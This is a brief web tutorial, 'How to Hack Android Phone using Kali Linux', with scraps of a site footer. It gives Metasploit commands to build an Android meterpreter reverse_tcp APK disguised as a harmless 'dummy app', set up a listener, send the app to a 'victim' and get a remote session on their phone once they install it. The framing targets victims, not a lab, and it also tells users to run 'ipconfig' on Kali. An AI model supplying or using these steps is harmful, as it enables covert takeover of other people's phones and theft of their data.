How to Hack Android Phone using Kali Linux

Steps to hack android Phone:
Step 1: Open Terminal and type:
ipconfig

k1

to check your ip address.Here my ip is 192.168.43.203 , which is also the attackers(my) ip address

l2

Step 2: Now i will be creating a dummy android app that i will sent to the victim.For that just type :
msfpayload android/meterpreter/reverse_tcp

LHOST=attacker_ip_address LPORT=port_to_receive_connection R > Appname.apk

l3

As the Attacker_ip_address = your ip address that you found out using ipconfig

port_to_receive_connection= 81

dummy android app

Step 3: Now while waiting open up new terminal and type
msfconsole to run the metasploit.

Step 4: Now type
use multi/handler

l4

Step 5: Now you have to type:

set payload android/meterpreter/reverse_tcp
and then type

set LHOST <Attacker_ip_address>
and then set LPORT=81

l5

Step 6: Now send the dummy app to the victim..upload it to net or try any other method.

l6

Step 7: Once the victim install the application and runs it ,you will start seeing a session.

l7

Step 8: That’s it we are in the victims android phone and can whatever we want.Just type help inorder to get the list of commands!

GpHow
Logo
Compare items
  • Total (0)
Compare
0